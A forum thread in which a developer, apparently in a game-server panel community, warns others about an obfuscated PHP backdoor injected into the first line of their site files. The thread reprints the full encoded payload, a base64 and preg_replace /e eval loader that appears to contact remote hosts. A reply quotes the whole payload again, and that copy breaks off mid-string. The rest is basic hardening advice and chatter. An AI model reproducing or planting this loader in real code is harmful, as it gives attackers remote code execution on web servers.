[Discussion] Web security very critical must read!!

[tearhear18]

I WOULD LIKE TO ALERT ALL DEV,s ADMIN's as i found out this bunch of php code injected inline in our php code..

history::
at the first time i just ignore it since im developing xcache technology for fast loading site i thought mycode was generating this line. BUT!!it makes me crazy when i reverse this obfuscated code. and oh duck. its a function! what it does?


FULL ROOT ACCESS + terminal command..NO JOKE!!! !!

i will not share the decoded part of this cause it might harm some others.

SOLUTION:
CHMOD /read mode/
.htaccess to prevent access directories
.input $_POST $_GET filter
.sanitize url
tagalog:
kaya pala madali lang magshare ng rancp kasi di mo nmn gawa nakaw mo lang.


HERE IS THE INJECTED CODE!!IN LINE 1

/*versio:3.01*/$II1I=114896;if (!function_exists('IIIllllI')){$GLOBALS['II1I'] = 'G=gaW5pX3NldAzDYWxsb3dfdXJsX2ZvcGVuLVZGlzcGxheV9lcnJvcnMAQcZnRwL2Z0cDIwMTMxMTE0My4wMQNSWxJMWxsSTExSTFJaHR0cDovLw?fSFRUUFMmOb2Zm$faHR0cHM6Ly8VSFRUUF9IT1NUCypp!dW5pb24(k_K_iJCc2VsZWN0IUkVRVUVTVF9VUkk&;;NruU0NSSVBUX05BTUUNUVVFUllfU1RSSU5H^^TPw}}ZGV0ZXJtaW5hdG9yJDnLgX?ULmxvZwjpSFRUUF9ZX0FVVEgFgYmFzZTY0X2RlY29kZQ!JT}!hdmVyc2lvJmLQ{&MLXBocAYnlSFRUUF9FWEVDUEhQ&!}b3V0LbPb2sCqSFRUUF9VU0VSX0FHRU5ULAkNYZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAsyYQ{^ oc2V6cW8ubmV0%PZmFzdGFkZHouY29tL3czLnBocD91PQRJms9JnQ9cGhwJnA9FbbUJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYyMXZtMGdRL2l1YlZSU0JSREJnTzdiajQrUW81MTZRVWhNY3AxTFZSc2pGUzQyS3dRTGNwSXJ5MzI5bWQzbExjSy81RW50bjUyWG41Wm5IVVVpVWt3MExvNFJ0RkxwaEJjdDJVYkl1MG95cTZndUpRQndla3FDSTBzUm56MUZlNUlyak9ESDhPVXBmSTZhaDRyVlpsRVIrem9wYVpnNDFZaGtxM0ZDbkhlTCtDQ1FURUJzZ2ZpV2xDL0xVVDFqaGh5d05sVlBQTUR6UDA4alpxZWU1aHVjU215d2VibTlWOGtMcWsxMFVaR2tSN1poU1pBY0d4akpXSExLRU5FMTB1ZmpPaWpDS21ZS1dYTmZRd0tUaEdhNm5jdU1HNklGeEdoeXltRTdKcVdOQzVDYWNTSmxPZlhoU0FTSk1FSDhlR0ZUb09vN1RKeCtVL0REZHM0U3F4QVlySnNXWVpXQXpkSXUzL1NCTkNwWkFRdW0yS1BhWHZSNGxPcEh4OEU4OElKM1FzeWM3L0I1US9nd1c1NnlyS0RKRUxNYXBFNXV4NDBDME0zbXFnT29wMnZXTTFodWdKT2tlWHdGQ3lGTmJ5SjVaQUtLWlZGU2tXWTFjUHl4djNidVZELzgwOGdleEJ3Y00vYmlkbS9uVlAvT2xSc0kxdk8yM041ZnoxY055c1ZwZUxlNC9vSVlzK1hHRmEzZXhtRit2VnM3SHVmdXcwc2dGSmdKNlVCUnpKcDlkNnFFcHJMZ2Z4R25PR3FlWWNMYmJGNzhVcVF4cHJzMVFPbjB0cXl0UHkwcnhWdVU5aU83Q1BBMStZRi9VWFRmbW5ZZk43SWtXZEEwNEdVcWZaZjhLTXhDcks5eVI5a1JBMk9IK2dFMVFqZ3o5ZDc0aUw3SUtyMVRITXVRL3lNMXFkZGN6ZFFNT3ZtWmZFL2gzaytiRkpZRVBMektrVnk3Z2FZcE5lQXU0dUx1NTg5MTduZmFvamg4L3paZjNqcnZvY1BxUXMrejg2anYwOUNVNEYvcmNYbW56YVlzamQ5STE1UEpGS2prN0k4cWJvU2JudGZndllxbDFOblRNS3N4U0l3clRHdk5CbVlXeWloVUc4QzV4c1JMc2VSK25HNmJRS2ppdE5BbjNEZ2xDbGJ6OXhYaXNRU1hhZGVueGU5em42M3VjU1E4RlpFa1JwZURGZHVHL0MyOWd3VFlsOUxOUGRTblU2U1YrNW5KWm9CWnc3YmQ3bU5qc0o4dXdOV05zelJwVlR2MzcrUkpLODBXS0hsR1ZaODMxN0FwMmh4T095cnlCREtoMkxSbE41SFNnd0dzSXhoZVFVeWx4V3lxbVlmRUZJSG8xeW5uV3lqRHFXK1pBSXlQMXNkd21zK05YeUlsTjZrTUwxc3RBRlhqOHhyRUZ3WnFtVExrVTYzWmVaRVVLK0F2NTZYSXlNTEU1VkN4bm1HWnNIV3hod0h3Y2xIVXVBY3V3LzY3cmc4R0N5WDJLemNVUHRjWjJHMlBFQ0FObzRZdFVmMnpFT0RMNWNxc1IrNml0RVR4MC9HZTJYaUVxNWVSb3FzZFlrQ0htR2hIanVKeGozenV4WmZTRkdBdDZ0SjZXT2VFTjhmOU85RVkxclQ0a3pGSmhOWFE1TGsxTzJ4T0VTN0lBM1BVM1VjWUNvQ1MvRkw3ZUFHRE4ySWJEWkEwUTRmc2ZuTnU1NzZ2NlA4NFN3TjVkZmdZUGQxZkxLL2c0NWZqcjhtMStsV1hyWHdxaHZRMzcyY3UzT3hoZTJpdDIrNTRld2lZK1B5VFJjMzNrWE0vTGt6cGl1dnA0UngvYkovUHFhTDc0MUx4UmZvV29XaWRTZ2Z0QjZ4VjVPQUM0ckRkK0lSNU1nUnpKcCtwVVhLMitQdTNQSlhub0NhWDhpRFNBTG1jZ2EvVzhUQWgyUFc2cjJKVE5mdEpZY2JGa0V2eWpibmRtVmxDZjNIL0tvbUw5RGJsVVN4T0RRVUloRHFma0cvai9VYUprdlM3eDJwUTNOaCtSdU42T0NQWUFMeTlFME5PYVBGb0RpL2RMeVI3TENVTTkwTFJMUk9oQ2dXcEVPRThDZWhUYnM5MW1XUHJVNWJLVCtLaExPRVQ0QXp3SHlyWmhkbGRiNm5Wd0Z5WjJ1aTZ0VDM4VGZXVlNzcEk0NWhTelBHM2F2QkRvZkFSQXJkRkF2TXEycFZ1NUkySDExVEJpVFJBQmNUdUsxU00zVEd0UDFRUWRDZnhZMWNwTlVRZlR0NGJpZ1dLNU5BUjlBNk1zdVl1RGE4aXhaUmhkWWZmN0ZaVEFUd2oyY3gyWFduOFlJNkx3QUdLc1R5NGd0cjRxdXVJNUtoVFJJQkFxMGxwSTdnZmttSnpRbTBCUEVBZC92elg2STROdnpOYldLT2xEZld1Q3QxcUJUQ0NRSWF3dk1XWW1sTlo4czFORUNGb2xQYkZ0SHAyWUhxZ2hwNmloNEl0SGU2TGhjekRrblNkV3RTZVl6dXlBRTRXYW5UdXhtZ1prY3pqSGZJalJONUJyNUY4cUVKRUNXSW1JVVg0UjF1RUxKM1VWMFJLSzBqMmsyMTRCZVd2TmZZa1k0cGRYMWYxWS9TSTlCRnVsT1JFQWpFRjgyREEvVFFMV2tyUW1YaFFXZm1haE56SFZRTnZqQ3U4YjZSbHhBdERNR0M1V3MyclpkMEZJOG9HWTBraWtQT0lQNVFTYk5CYmRZSXhlQm1JODRGWmRzQ0hTcFVFRkRFM0JCUS9zL1VRTkxha2lacENqQkdxRHd6ZS9Zc1dqZ2F6V1AyU25YVWtWNkN0L21oeEhKc210L2dPdWs1eWQiKSkpOw#(cHJlZ19yZXBsYWNlvDJ';function IIIllllI($a, $b){$c=$GLOBALS['II1I']; $d=pack('H*','6261736536345f6465'.'636f6465'); return $d(substr($c, $a, $b));};$II1lIl1II = IIIllllI(3422, 16);$II1lIl1II("/Il11lI1II/e", IIIllllI(526, 2894), "Il11lI1II");};?><?php /*versio:3.01*/$IlIl=114896;if (!function_exists('IIl1llII')){$GLOBALS['IlIl'] = 'EaW5pX3NldA*#YWxsb3dfdXJsX2ZvcGVuFSZGlzcGxheV9lcnJvcnMBYQOZnRwL2Z0cDIwMTMxMTE0My4wMQNQVSWxJMWxsSTExSTFJoXaHR0cDovLwAGSFRUUFMS@Cb2ZmaHR0cHM6Ly8hnlqnSFRUUF9IT1NUVRV_dW5pb24M=GgFCy.c2VsZWN0jUkVRVUVTVF9VUkkrlOU0NSSVBUX05BTUU?cUVVFUllfU1RSSU5HXPwZGV0ZXJtaW5hdG9yY;Lgq#qrvwLmxvZwSFRUUF9ZX0FVVEg)YmFzZTY0X2RlY29kZQso@tdmVyc2lvu#LQ{_tLXBocAwSFRUUF9FWEVDUEhQmb3V0t&Z$Gb2sJHFSFRUUF9VU0VSX0FHRU5UJLA_Z29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQ Uotyc2V6cW8ubmV0ZmFzdGFkZHouY29tQr;L3czLnBocD91PQd^JJms9~MEJnQ9cGhwJnA9LJnY9ZZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdHVtMG9RZnBVTmlpS1FDQWJiT0c1OE9IS1V1ZzFTYW1MSHFWUzFFWEx4VXFOaXNBQTNxYUs4KzVuWkN3c3Q3cW4vR0daMjV6N2ZERWxNOUpNTmpaT01iblJ0UXl0YTdKSnNYZVdGWmhndkpBRjJmTWlpS3NtemtENG5aVlhxdnA4NmFlcjd1bU1TeHpidzJEVEprckNrVllNM01FbmZOdUNFTWVsZ0Qxemd2QUcyRGV4WElsV1FwMEZHcXpDbWVheWZMaGJCWW1HYjVPeDBFZGkydlNBZW1UL2MzaHJraFNqS0xvbUt2RXAyVksrS0F3VmhCYTBPUlVhYUlycFVmS05WbktSVVAvVjl4MGw5azV6NllGZnFnelB3QktRVWhHdlJvVWkxQ2FpREgxTW5lSllXZ2tzVnNEQkF6RDBRcUd2ck5NMmZRcmdVeHZtZVpwcEJQSkRpYUdpek1HeUthdkYwR09WWlJUTUlxTGF0cXYxbHI2Y1Jpd2g3MkJNenlDTGEyWk1YZjRzMDVnWk5TOXFWRkdHaXdlejNIYmdJMWs0RlZZZXJRUFZUUmxVK1FFcnlQWHFCSk5EV1l0Sm5HZ0ZyS2k3cVFxeEpyaCtXdDhIZEtvUS9rL3lGN2RFQlRUOHU1MloyOVhhMk5FbThCdC8rZUhJNVd6MHM1NnZsMWZ6K0hkNFFLVDkrNFRxWXoyZlhxNVgvWVJZOHJFd3lNcml2UGt2dlZMZ3Q3NkVvekhnWXBYbEpHMVFNT04zdHE1KzZ1QXhoVm1JMGJmSXFzeXVvTWxPc1ZGa05vcnE0ektQdldCZXE2c1pRMzFETUN6dGdEL0MzV0pqRUZUcGwvZktLeHhldWpyUTdBc3lPOXdkZUJMeGx0UGV6RlhrUldYalZMRXhEK1ozY3JGWjNQY2V5Z2ZDbCtKTEIzMDFlVnBjRUhsNkVTYStNWVV5NFZYWUFLdTV1N3NMZzN0SjZtb1dQSDJmTGV6K1lkeWg5S0dseGZ2VU5hdm9TbFBQN1RKNlUrYlRGbGp2cGFuTGhrVUhPem9qK1MxT1RjOFgraC9RTkZRMExvd3E5MUxEQzZZOVpvMHhqa2NVYUEzaHVzTWpwOHo3Tk4xVFhhdU5NS1JMT0hUS0VLbkg2cy8yb1FDWFpkZHpqNTVqTzE5OXhKajlVRUNXMHdsNndIR05OUVFHOUVCcHRjNko5Q2pWTE1DM3RFcDQ1WHlTb0JWejc3UjQ2dHZoQkM2d2YwT29ZQ2xWT3cvdlpFbEx6V2JBZThTcnozUTY4R25iZE1VTmx6QzRVMnFMQnVSakw3bkNnRUZMRkdGOUFURG1IRllqaU9MYkxCZ0N2MWFSa1VaTm1xRk1PQ0xnd0h1VTBtUjQvUWs0OG9vaDlJQTRsbnJVVkQzRHlPQ0xrZ20xNVpWVlVPZUF2eEtkTHlSQWQ2UnVZempndjZEcmFRb09GMkNqcmtvZ1VlUCtxL0tDeElIS2ZRM0Z4b3FtRWpRWm9NY0lBU3Znc3JqODJiTHh3MlhCVGlIMVVGb1orL0hleVhzRXEvZVJvcUZtdVhJdzFJc1p4UHNPKzM5aDlsazlnWTBLUDVyUGY3N09DK0g4bFZpT2IvY0VicUR3RFJrT1hZaWx5MHU0Z0hKSVY0RzY0U1FvYXdVcnlVK2ZsZ0hEdkFURmJBMFNFNFR2L2RoYUdodlhXWHdMWUI4dFBvT0h1YW5rRmo2enJVd2c1dUh4VkZPdWZPdEY2Ry9xalYyNTMwTHhhcjlydGUxWU1rL2o4a0NYUGl1UmZ6eVJGV2F5dFB0eHBqMjNLckNiTjVoK2JKK1FyV05XaWlBdE1EMHF2bDRjRGdNdDZFMWJjWWMwd3BhdVd4by9XcjAvN2M3RTg5UGlsOGdnM2dpcW53R3ZWdkFnSXEzb1lPRUVnaXYxRWpEaEJaRERMSGkydk03Sjg5U25EcHlLcDFsOXhsMnJjNU1iZ1FzR0pFL0lWOUgrWEtGbVBTM1pzd2dxYnRVaXFwaU9DUGNETEMrSHJxVm9lKzBPSDFZdmNIbVdIc1pHenNEMkpDRjBvVUxjSTh3NU8yOTUwdDNHbFRrc01PNEdQbG9CRGhEL0FjMWpaTnRUcktrdExHZWV5U3JlRTlNa2ZySzlGR256RmhCR0hBWlBVaHN6UkJVZm5Jd0Rhdnhod3J6eFBxQlZyTEFSWHdVaC9ESlk1T0IzNTZCRVRwalduMUlMdU9JaEtwcHdVeXBoQjN4RU9zdUhTWkl6UXlucDN3V1VtOElRWlhXWVBCZ01KSmZBSlFYK3NVM25yTDIxMGJSd1JKbWxRd01XQndhdmlPYWwwWGlCc2Uxamd1dlFPZDB3MjVlUU8rT2VwTVJpNWJHSzJwb1pjSDlTcDhRaEQwalFFWSszQytHSnRob0RQUGkzYWN3Qk5NR3Z1aWVjeDYzanFnTUxNaS9tK2VMUW1HanFIUS96bU1rUXg4V1Z4ZXNDT3dwdWRNN0h1QnR6bXNJK3BMblREY28zN2x3R0xTSVZiQ2JOUnZIRHA4TUtXdW5yUjRoZU5pUXkzdDRMbHJkWDNFakg0bDFkZC9aajlLajlFVzczWkVRQ01VWHJZMEREUEl0cml0RHFlSnhZK3MxQ2JpQjM0VitPOUNvL0x0c05XeEVaODhNak8rdFVJc1draXBqUUNLVWg4by9UNVJxbEVqckc3aDlnZTdKUksyUEROR0t0VkFvTml1R3p1ZG5XVTY5UlhNT1RpSTg3Qnd2ajFLNVk1RGN1cStwQ2RkQVdWbzYvNE5EbU9UR0szK2c5REhKbUEiKSkpOwcHJlZ19yZXBsYWNl';function IIl1llII($a, $b){$c=$GLOBALS['IlIl']; $d=pack('H*','6261'.'736536345f6465636f6465'); return $d(substr($c, $a, $b));};$I111II1lI = IIl1llII(3401, 16);$I111II1lI("/IllI111lI/e", IIl1llII(523, 2878), "IllI111lI");};

 

[tearhear18]

Re: Web security very critical must read!!

dont even try to disregard this. it might harm your server. we dont know! just check your php file. check your first line scroll to the right

i dont know how they inject the code pls help us to catch the hole for this . else it might compromise your whole site. your server files. everything inside your machine can be access..

if you know how the code injected tell it to me privately or here so i can fixed it for us..
as of now our remedy is .htaccess which deny the access of our php files but it doesnt mean we are secure..

 

[[GM]:Glenox]

Re: Web security very critical must read!!

nice for the info tearhear18... but i already learn thats... hehehe Big thanks.


Tagalog:
hehehe... nice tut tear... dami kc leech ehh... pero kung asp code... medyo mahirap makuha... hehehe... pero pwede parin makuha pag asp code... kya yung iba ingat ingat din... kya i download ang buong ran cp nyo...

 

[carvicsy09]

Re: Web security very critical must read!!

can you give me already .php file

 

[raffy0809]

Re: Web security very critical must read!!

wooooo nothing critical at all XD:junglejane:

 

[tearhear18]

Re: Web security very critical must read!!

oh really? nothing critical? ok ignore it, i just want to alert some other guy who understand it. so they can remove it and keep their files safe..
and to those guys who doing this and trying to get my RanCP F**K U files go get it it will be useless to you swear 100% the code is obfuscated and you are just downloading my front end file no logic at all go get it.. if you want im going to share it to you privately or even here...
I know someone enter my public html file but I just ASSURE you you are downloading TRASH FILE..

to other fellow devs and mates check your php line. and put htaccess for those include folders. and deny write mode for all php file so they cannot inject code.

 

[mepogi]

Re: Web security very critical must read!!

I WOULD LIKE TO ALERT ALL DEV,s ADMIN's as i found out this bunch of php code injected inline in our php code..

history::
at the first time i just ignore it since im developing xcache technology for fast loading site i thought mycode was generating this line. BUT!!it makes me crazy when i reverse this obfuscated code. and oh duck. its a function! what it does?


FULL ROOT ACCESS + terminal command..NO JOKE!!! !!

i will not share the decoded part of this cause it might harm some others.

SOLUTION:
CHMOD /read mode/
.htaccess to prevent access directories
.input $_POST $_GET filter
.sanitize url
tagalog:
kaya pala madali lang magshare ng rancp kasi di mo nmn gawa nakaw mo lang.


HERE IS THE INJECTED CODE!!IN LINE 1

/*versio:3.01*/$II1I=114896;if (!function_exists('IIIllllI')){$GLOBALS['II1I'] = 'G=gaW5pX3NldAzDYWxsb3dfdXJsX2ZvcGVuLVZGlzcGxheV9lcnJvcnMAQcZnRwL2Z0cDIwMTMxMTE0My4wMQNSWxJMWxsSTExSTFJaHR0cDovLw?fSFRUUFMmOb2Zm$faHR0cHM6Ly8VSFRUUF9IT1NUCypp!dW5pb24(k_K_iJCc2VsZWN0IUkVRVUVTVF9VUkk&;;NruU0NSSVBUX05BTUUNUVVFUllfU1RSSU5H^^TPw}}ZGV0ZXJtaW5hdG9yJDnLgX?ULmxvZwjpSFRUUF9ZX0FVVEgFgYmFzZTY0X2RlY29kZQ!JT}!hdmVyc2lvJmLQ{&MLXBocAYnlSFRUUF9FWEVDUEhQ&!}b3V0LbPb2sCqSFRUUF9VU0VSX0FHRU5ULAkNYZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAsyYQ{^ oc2V6cW8ubmV0%PZmFzdGFkZHouY29tL3czLnBocD91PQRJms9JnQ9cGhwJnA9FbbUJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYyMXZtMGdRL2l1YlZSU0JSREJnTzdiajQrUW81MTZRVWhNY3AxTFZSc2pGUzQyS3dRTGNwSXJ5MzI5bWQzbExjSy81RW50bjUyWG41Wm5IVVVpVWt3MExvNFJ0RkxwaEJjdDJVYkl1MG95cTZndUpRQndla3FDSTBzUm56MUZlNUlyak9ESDhPVXBmSTZhaDRyVlpsRVIrem9wYVpnNDFZaGtxM0ZDbkhlTCtDQ1FURUJzZ2ZpV2xDL0xVVDFqaGh5d05sVlBQTUR6UDA4alpxZWU1aHVjU215d2VibTlWOGtMcWsxMFVaR2tSN1poU1pBY0d4akpXSExLRU5FMTB1ZmpPaWpDS21ZS1dYTmZRd0tUaEdhNm5jdU1HNklGeEdoeXltRTdKcVdOQzVDYWNTSmxPZlhoU0FTSk1FSDhlR0ZUb09vN1RKeCtVL0REZHM0U3F4QVlySnNXWVpXQXpkSXUzL1NCTkNwWkFRdW0yS1BhWHZSNGxPcEh4OEU4OElKM1FzeWM3L0I1US9nd1c1NnlyS0RKRUxNYXBFNXV4NDBDME0zbXFnT29wMnZXTTFodWdKT2tlWHdGQ3lGTmJ5SjVaQUtLWlZGU2tXWTFjUHl4djNidVZELzgwOGdleEJ3Y00vYmlkbS9uVlAvT2xSc0kxdk8yM041ZnoxY055c1ZwZUxlNC9vSVlzK1hHRmEzZXhtRit2VnM3SHVmdXcwc2dGSmdKNlVCUnpKcDlkNnFFcHJMZ2Z4R25PR3FlWWNMYmJGNzhVcVF4cHJzMVFPbjB0cXl0UHkwcnhWdVU5aU83Q1BBMStZRi9VWFRmbW5ZZk43SWtXZEEwNEdVcWZaZjhLTXhDcks5eVI5a1JBMk9IK2dFMVFqZ3o5ZDc0aUw3SUtyMVRITXVRL3lNMXFkZGN6ZFFNT3ZtWmZFL2gzaytiRkpZRVBMektrVnk3Z2FZcE5lQXU0dUx1NTg5MTduZmFvamg4L3paZjNqcnZvY1BxUXMrejg2anYwOUNVNEYvcmNYbW56YVlzamQ5STE1UEpGS2prN0k4cWJvU2JudGZndllxbDFOblRNS3N4U0l3clRHdk5CbVlXeWloVUc4QzV4c1JMc2VSK25HNmJRS2ppdE5BbjNEZ2xDbGJ6OXhYaXNRU1hhZGVueGU5em42M3VjU1E4RlpFa1JwZURGZHVHL0MyOWd3VFlsOUxOUGRTblU2U1YrNW5KWm9CWnc3YmQ3bU5qc0o4dXdOV05zelJwVlR2MzcrUkpLODBXS0hsR1ZaODMxN0FwMmh4T095cnlCREtoMkxSbE41SFNnd0dzSXhoZVFVeWx4V3lxbVlmRUZJSG8xeW5uV3lqRHFXK1pBSXlQMXNkd21zK05YeUlsTjZrTUwxc3RBRlhqOHhyRUZ3WnFtVExrVTYzWmVaRVVLK0F2NTZYSXlNTEU1VkN4bm1HWnNIV3hod0h3Y2xIVXVBY3V3LzY3cmc4R0N5WDJLemNVUHRjWjJHMlBFQ0FObzRZdFVmMnpFT0RMNWNxc1IrNml0RVR4MC9HZTJYaUVxNWVSb3FzZFlrQ0htR2hIanVKeGozenV4WmZTRkdBdDZ0SjZXT2VFTjhmOU85RVkxclQ0a3pGSmhOWFE1TGsxTzJ4T0VTN0lBM1BVM1VjWUNvQ1MvRkw3ZUFHRE4ySWJEWkEwUTRmc2ZuTnU1NzZ2NlA4NFN3TjVkZmdZUGQxZkxLL2c0NWZqcjhtMStsV1hyWHdxaHZRMzcyY3UzT3hoZTJpdDIrNTRld2lZK1B5VFJjMzNrWE0vTGt6cGl1dnA0UngvYkovUHFhTDc0MUx4UmZvV29XaWRTZ2Z0QjZ4VjVPQUM0ckRkK0lSNU1nUnpKcCtwVVhLMitQdTNQSlhub0NhWDhpRFNBTG1jZ2EvVzhUQWgyUFc2cjJKVE5mdEpZY2JGa0V2eWpibmRtVmxDZjNIL0tvbUw5RGJsVVN4T0RRVUloRHFma0cvai9VYUprdlM3eDJwUTNOaCtSdU42T0NQWUFMeTlFME5PYVBGb0RpL2RMeVI3TENVTTkwTFJMUk9oQ2dXcEVPRThDZWhUYnM5MW1XUHJVNWJLVCtLaExPRVQ0QXp3SHlyWmhkbGRiNm5Wd0Z5WjJ1aTZ0VDM4VGZXVlNzcEk0NWhTelBHM2F2QkRvZkFSQXJkRkF2TXEycFZ1NUkySDExVEJpVFJBQmNUdUsxU00zVEd0UDFRUWRDZnhZMWNwTlVRZlR0NGJpZ1dLNU5BUjlBNk1zdVl1RGE4aXhaUmhkWWZmN0ZaVEFUd2oyY3gyWFduOFlJNkx3QUdLc1R5NGd0cjRxdXVJNUtoVFJJQkFxMGxwSTdnZmttSnpRbTBCUEVBZC92elg2STROdnpOYldLT2xEZld1Q3QxcUJUQ0NRSWF3dk1XWW1sTlo4czFORUNGb2xQYkZ0SHAyWUhxZ2hwNmloNEl0SGU2TGhjekRrblNkV3RTZVl6dXlBRTRXYW5UdXhtZ1prY3pqSGZJalJONUJyNUY4cUVKRUNXSW1JVVg0UjF1RUxKM1VWMFJLSzBqMmsyMTRCZVd2TmZZa1k0cGRYMWYxWS9TSTlCRnVsT1JFQWpFRjgyREEvVFFMV2tyUW1YaFFXZm1haE56SFZRTnZqQ3U4YjZSbHhBdERNR0M1V3MyclpkMEZJOG9HWTBraWtQT0lQNVFTYk5CYmRZSXhlQm1JODRGWmRzQ0hTcFVFRkRFM0JCUS9zL1VRTkxha2lacENqQkdxRHd6ZS9Zc1dqZ2F6V1AyU25YVWtWNkN0L21oeEhKc210L2dPdWs1eWQiKSkpOw#(cHJlZ19yZXBsYWNlvDJ';function IIIllllI($a, $b){$c=$GLOBALS['II1I']; $d=pack('H*','6261736536345f6465'.'636f6465'); return $d(substr($c, $a, $b));};$II1lIl1II = IIIllllI(3422, 16);$II1lIl1II("/Il11lI1II/e", IIIllllI(526, 2894), "Il11lI1II");};?><?php /*versio:3.01*/$IlIl=114896;if (!function_exists('IIl1llII')){$GLOBALS['IlIl'] = 'EaW5pX3NldA*#YWxsb3dfdXJsX2ZvcGVuFSZGlzcGxheV9lcnJvcnMBYQOZnRwL2Z0cDIwMTMxMTE0My4wMQNQVSWxJMWxsSTExSTFJoXaHR0cDovLwAGSFRUUFMS@Cb2ZmaHR0cHM6Ly8hnlqnSFRUUF9IT1NUVRV_dW5pb24M=GgFCy.c2VsZWN0jUkVRVUVTVF9VUkkrlOU0NSSVBUX05BTUU?cUVVFUllfU1RSSU5HXPwZGV0ZXJtaW5hdG9yY;Lgq#qrvwLmxvZwSFRUUF9ZX0FVVEg)YmFzZTY0X2RlY29kZQso@tdmVyc2lvu#LQ{_tLXBocAwSFRUUF9FWEVDUEhQmb3V0t&Z$Gb2sJHFSFRUUF9VU0VSX0FHRU5UJLA_Z29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQ Uotyc2V6cW8ubmV0ZmFzdGFkZHouY29tQr;L3czLnBocD91PQd^JJms9~MEJnQ9cGhwJnA9LJnY9ZZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdHVtMG9RZnBVTmlpS1FDQWJiT0c1OE9IS1V1ZzFTYW1MSHFWUzFFWEx4VXFOaXNBQTNxYUs4KzVuWkN3c3Q3cW4vR0daMjV6N2ZERWxNOUpNTmpaT01iblJ0UXl0YTdKSnNYZVdGWmhndkpBRjJmTWlpS3NtemtENG5aVlhxdnA4NmFlcjd1bU1TeHpidzJEVEprckNrVllNM01FbmZOdUNFTWVsZ0Qxemd2QUcyRGV4WElsV1FwMEZHcXpDbWVheWZMaGJCWW1HYjVPeDBFZGkydlNBZW1UL2MzaHJraFNqS0xvbUt2RXAyVksrS0F3VmhCYTBPUlVhYUlycFVmS05WbktSVVAvVjl4MGw5azV6NllGZnFnelB3QktRVWhHdlJvVWkxQ2FpREgxTW5lSllXZ2tzVnNEQkF6RDBRcUd2ck5NMmZRcmdVeHZtZVpwcEJQSkRpYUdpek1HeUthdkYwR09WWlJUTUlxTGF0cXYxbHI2Y1Jpd2g3MkJNenlDTGEyWk1YZjRzMDVnWk5TOXFWRkdHaXdlejNIYmdJMWs0RlZZZXJRUFZUUmxVK1FFcnlQWHFCSk5EV1l0Sm5HZ0ZyS2k3cVFxeEpyaCtXdDhIZEtvUS9rL3lGN2RFQlRUOHU1MloyOVhhMk5FbThCdC8rZUhJNVd6MHM1NnZsMWZ6K0hkNFFLVDkrNFRxWXoyZlhxNVgvWVJZOHJFd3lNcml2UGt2dlZMZ3Q3NkVvekhnWXBYbEpHMVFNT04zdHE1KzZ1QXhoVm1JMGJmSXFzeXVvTWxPc1ZGa05vcnE0ektQdldCZXE2c1pRMzFETUN6dGdEL0MzV0pqRUZUcGwvZktLeHhldWpyUTdBc3lPOXdkZUJMeGx0UGV6RlhrUldYalZMRXhEK1ozY3JGWjNQY2V5Z2ZDbCtKTEIzMDFlVnBjRUhsNkVTYStNWVV5NFZYWUFLdTV1N3NMZzN0SjZtb1dQSDJmTGV6K1lkeWg5S0dseGZ2VU5hdm9TbFBQN1RKNlUrYlRGbGp2cGFuTGhrVUhPem9qK1MxT1RjOFgraC9RTkZRMExvd3E5MUxEQzZZOVpvMHhqa2NVYUEzaHVzTWpwOHo3Tk4xVFhhdU5NS1JMT0hUS0VLbkg2cy8yb1FDWFpkZHpqNTVqTzE5OXhKajlVRUNXMHdsNndIR05OUVFHOUVCcHRjNko5Q2pWTE1DM3RFcDQ1WHlTb0JWejc3UjQ2dHZoQkM2d2YwT29ZQ2xWT3cvdlpFbEx6V2JBZThTcnozUTY4R25iZE1VTmx6QzRVMnFMQnVSakw3bkNnRUZMRkdGOUFURG1IRllqaU9MYkxCZ0N2MWFSa1VaTm1xRk1PQ0xnd0h1VTBtUjQvUWs0OG9vaDlJQTRsbnJVVkQzRHlPQ0xrZ20xNVpWVlVPZUF2eEtkTHlSQWQ2UnVZempndjZEcmFRb09GMkNqcmtvZ1VlUCtxL0tDeElIS2ZRM0Z4b3FtRWpRWm9NY0lBU3Znc3JqODJiTHh3MlhCVGlIMVVGb1orL0hleVhzRXEvZVJvcUZtdVhJdzFJc1p4UHNPKzM5aDlsazlnWTBLUDVyUGY3N09DK0g4bFZpT2IvY0VicUR3RFJrT1hZaWx5MHU0Z0hKSVY0RzY0U1FvYXdVcnlVK2ZsZ0hEdkFURmJBMFNFNFR2L2RoYUdodlhXWHdMWUI4dFBvT0h1YW5rRmo2enJVd2c1dUh4VkZPdWZPdEY2Ry9xalYyNTMwTHhhcjlydGUxWU1rL2o4a0NYUGl1UmZ6eVJGV2F5dFB0eHBqMjNLckNiTjVoK2JKK1FyV05XaWlBdE1EMHF2bDRjRGdNdDZFMWJjWWMwd3BhdVd4by9XcjAvN2M3RTg5UGlsOGdnM2dpcW53R3ZWdkFnSXEzb1lPRUVnaXYxRWpEaEJaRERMSGkydk03Sjg5U25EcHlLcDFsOXhsMnJjNU1iZ1FzR0pFL0lWOUgrWEtGbVBTM1pzd2dxYnRVaXFwaU9DUGNETEMrSHJxVm9lKzBPSDFZdmNIbVdIc1pHenNEMkpDRjBvVUxjSTh3NU8yOTUwdDNHbFRrc01PNEdQbG9CRGhEL0FjMWpaTnRUcktrdExHZWV5U3JlRTlNa2ZySzlGR256RmhCR0hBWlBVaHN6UkJVZm5Jd0Rhdnhod3J6eFBxQlZyTEFSWHdVaC9ESlk1T0IzNTZCRVRwalduMUlMdU9JaEtwcHdVeXBoQjN4RU9zdUhTWkl6UXlucDN3V1VtOElRWlhXWVBCZ01KSmZBSlFYK3NVM25yTDIxMGJSd1JKbWxRd01XQndhdmlPYWwwWGlCc2Uxamd1dlFPZDB3MjVlUU8rT2VwTVJpNWJHSzJwb1pjSDlTcDhRaEQwalFFWSszQytHSnRob0RQUGkzYWN3Qk5NR3Z1aWVjeDYzanFnTUxNaS9tK2VMUW1HanFIUS96bU1rUXg4V1Z4ZXNDT3dwdWRNN0h1QnR6bXNJK3BMblREY28zN2x3R0xTSVZiQ2JOUnZIRHA4TU